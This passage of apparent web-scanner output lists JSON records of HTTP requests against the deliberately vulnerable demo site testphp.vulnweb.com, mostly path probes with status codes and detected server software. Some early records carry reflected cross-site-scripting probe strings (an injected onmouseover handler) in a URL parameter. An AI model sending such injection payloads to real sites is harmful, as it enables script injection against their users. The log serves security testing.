ageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:42.127745207Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=x%22+onmouseover%3Dalert%280x106ED2%29+x%3D%22\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=x%22+onmouseover%3Dalert%280x106ED2%29+x%3D%22\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?p=valid\\u0026pp=x%22+onmouseover%3Dalert%280x106ED2%29+x%3D%22\",\"time\":\"357.617418ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":1,\"status_code\":200,\"content_length\":39,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:42.882968883Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=x%22+onmouseover%3Dnetsparker%280x00333D\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=x%22+onmouseover%3Dnetsparker%280x00333D\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?p=valid\\u0026pp=x%22+onmouseover%3Dnetsparker%280x00333D\",\"time\":\"351.765724ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":2,\"lines\":1,\"status_code\":200,\"content_length\":39,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:42.892848248Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=x%22+onmouseover%3Dnetsparker%280x00333D%29+x%3D%22\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=x%22+onmouseover%3Dnetsparker%280x00333D%29+x%3D%22\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?p=valid\\u0026pp=x%22+onmouseover%3Dnetsparker%280x00333D%29+x%3D%22\",\"time\":\"360.61548ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":1,\"status_code\":200,\"content_length\":44,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:42.97009021Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=x%22+onmouseover%3Dnetsparker%280x106ED2\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=x%22+onmouseover%3Dnetsparker%280x106ED2\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?p=valid\\u0026pp=x%22+onmouseover%3Dnetsparker%280x106ED2\",\"time\":\"344.30029ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":2,\"lines\":1,\"status_code\":200,\"content_length\":39,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:42.992425225Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/test.php\",\"input\":\"http://testphp.vulnweb.com/hpp/test.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/test.php\",\"time\":\"352.397857ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:43.025450132Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/http3A2F2Fwww.naturosante.com2Fadserver2Fadclick.php3Fbannerid3D8926zoneid3D026source3D26dest3Dhttp3A2F2Fwww.aiki-evolution.jp2Fyy-board2Fyybbs.cgi3Flist3Dthread\",\"input\":\"http://testphp.vulnweb.com/http3A2F2Fwww.naturosante.com2Fadserver2Fadclick.php3Fbannerid3D8926zoneid3D026source3D26dest3Dhttp3A2F2Fwww.aiki-evolution.jp2Fyy-board2Fyybbs.cgi3Flist3Dthread\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/http3A2F2Fwww.naturosante.com2Fadserver2Fadclick.php3Fbannerid3D8926zoneid3D026source3D26dest3Dhttp3A2F2Fwww.aiki-evolution.jp2Fyy-board2Fyybbs.cgi3Flist3Dthread\",\"time\":\"340.296748ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:43.255258666Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/http://testphp.vulnweb.com/\",\"input\":\"http://testphp.vulnweb.com/http://testphp.vulnweb.com/\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/http://testphp.vulnweb.com/\",\"time\":\"352.025484ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:43.360141988Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/huzaifapc.com\",\"input\":\"http://testphp.vulnweb.com/huzaifapc.com\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/huzaifapc.com\",\"time\":\"351.232533ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:43.415301623Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/huzaifapc11111.com\",\"input\":\"http://testphp.vulnweb.com/huzaifapc11111.com\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/huzaifapc11111.com\",\"time\":\"346.814991ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:43.417769557Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/images/\",\"input\":\"http://testphp.vulnweb.com/images/\",\"title\":\"Index of /images/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/images/\",\"time\":\"350.552251ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":128,\"lines\":9,\"status_code\":200,\"content_length\":377,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:43.47912994Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/images/)\",\"input\":\"http://testphp.vulnweb.com/images/)\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/images/)\",\"time\":\"350.203068ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:43.533380184Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/images/3\",\"input\":\"http://testphp.vulnweb.com/images/3\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/images/3\",\"time\":\"349.255055ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:43.67371086Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/images/3L\",\"input\":\"http://testphp.vulnweb.com/images/3L\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/images/3L\",\"time\":\"346.904531ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:43.769620457Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/images/A01\",\"input\":\"http://testphp.vulnweb.com/images/A01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/images/A01\",\"time\":\"355.351142ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:43.780059135Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/images/logo.gif\",\"input\":\"http://testphp.vulnweb.com/images/logo.gif\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/gif\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/images/logo.gif\",\"time\":\"349.399978ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":75,\"lines\":44,\"status_code\":200,\"content_length\":6660,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:43.830006037Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/images/logo.gif’\",\"input\":\"http://testphp.vulnweb.com/images/logo.gif%E2%80%99\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/images/logo.gif%E2%80%99\",\"time\":\"347.851654ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:43.99908035Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/images/remark.gif\",\"input\":\"http://testphp.vulnweb.com/images/remark.gif\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/gif\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/images/remark.gif\",\"time\":\"338.196867ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":79,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:47.269449359Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/index.bak)\",\"input\":\"http://testphp.vulnweb.com/index.bak%29\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.bak)\",\"time\":\"342.922268ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:47.375625133Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/index.bakA01\",\"input\":\"http://testphp.vulnweb.com/index.bakA01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.bakA01\",\"time\":\"342.986773ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:47.465094569Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/index.bakA01http://testphp.vulnweb.com/index.zip\",\"input\":\"http://testphp.vulnweb.com/index.bakA01http://testphp.vulnweb.com/index.zip\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.bakA01http://testphp.vulnweb.com/index.zip\",\"time\":\"344.476247ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:47.517607242Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/index.bakA01http://testphp.vulnweb.com/index.zipA01\",\"input\":\"http://testphp.vulnweb.com/index.bakA01http://testphp.vulnweb.com/index.zipA01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.bakA01http://testphp.vulnweb.com/index.zipA01\",\"time\":\"352.439752ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:47.890099464Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/index.php\",\"input\":\"http://testphp.vulnweb.com/index.php\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.php\",\"time\":\"356.482454ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:48.2199352Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/index.php)\",\"input\":\"http://testphp.vulnweb.com/index.php)\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.php)\",\"time\":\"344.465424ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:48.266726502Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/index.php?%25id%25=1\\u0026user=2\",\"input\":\"http://testphp.vulnweb.com/index.php?%25id%25=1\\u0026user=2\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.php?%25id%25=1\\u0026user=2\",\"time\":\"357.114113ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:48.507946896Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/index.php?id=%252%25\\u0026user=1\",\"input\":\"http://testphp.vulnweb.com/index.php?id=%252%25\\u0026user=1\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.php?id=%252%25\\u0026user=1\",\"time\":\"357.115284ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:49.019925204Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/index.phpConnection:\",\"input\":\"http://testphp.vulnweb.com/index.phpConnection:\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.phpConnection:\",\"time\":\"351.661083ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:49.1766459Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/index.zip\",\"input\":\"http://testphp.vulnweb.com/index.zip\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/zip\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.zip\",\"time\":\"346.925718ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":9,\"lines\":2,\"status_code\":200,\"content_length\":2586,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:50.804734113Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/index.zipA01\",\"input\":\"http://testphp.vulnweb.com/index.zipA01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.zipA01\",\"time\":\"359.7919ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:51.897166592Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/index.zipA01http://testphp.vulnweb.com/listproducts.ph\",\"input\":\"http://testphp.vulnweb.com/index.zipA01http://testphp.vulnweb.com/listproducts.ph\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.zipA01http://testphp.vulnweb.com/listproducts.ph\",\"time\":\"356.81488ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:52.158784297Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/index.zipA01http://testphp.vulnweb.com/listproducts.php\",\"input\":\"http://testphp.vulnweb.com/index.zipA01http://testphp.vulnweb.com/listproducts.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.zipA01http://testphp.vulnweb.com/listproducts.php\",\"time\":\"346.428321ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:52.48188392Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/index.zipA01http://testphp.vulnweb.com/listproducts.php?artist=1\",\"input\":\"http://testphp.vulnweb.com/index.zipA01http://testphp.vulnweb.com/listproducts.php?artist=1\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.zipA01http://testphp.vulnweb.com/listproducts.php?artist=1\",\"time\":\"351.989941ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:53.238226361Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/index.zipA01http://testphp.vulnweb.com/listproducts.php?artist=1A01\",\"input\":\"http://testphp.vulnweb.com/index.zipA01http://testphp.vulnweb.com/listproducts.php?artist=1A01\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.zipA01http://testphp.vulnweb.com/listproducts.php?artist=1A01\",\"time\":\"352.710348ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:53.238525213Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listpr\",\"input\":\"http://testphp.vulnweb.com/listpr\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listpr\",\"time\":\"344.018434ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:53.323169037Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listprodu\",\"input\":\"http://testphp.vulnweb.com/listprodu\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listprodu\",\"time\":\"349.975942ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:53.342600204Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.ph\",\"input\":\"http://testphp.vulnweb.com/listproducts.ph\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.ph\",\"time\":\"347.867351ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:53.39164488Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php\",\"input\":\"http://testphp.vulnweb.com/listproducts.php\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php\",\"time\":\"355.434198ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":491,\"lines\":105,\"status_code\":200,\"content_length\":4819,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:53.604245947Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php12\",\"input\":\"http://testphp.vulnweb.com/listproducts.php12\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php12\",\"time\":\"346.627922ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:53.706895531Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php12H\",\"input\":\"http://testphp.vulnweb.com/listproducts.php12H\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php12H\",\"time\":\"344.036363ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:53.773618738Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist\",\"time\":\"345.497235ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4975,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:53.783446889Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?-\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?-\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?-\",\"time\":\"356.957439ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":491,\"lines\":105,\"status_code\":200,\"content_length\":4819,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:53.833656407Z\",\"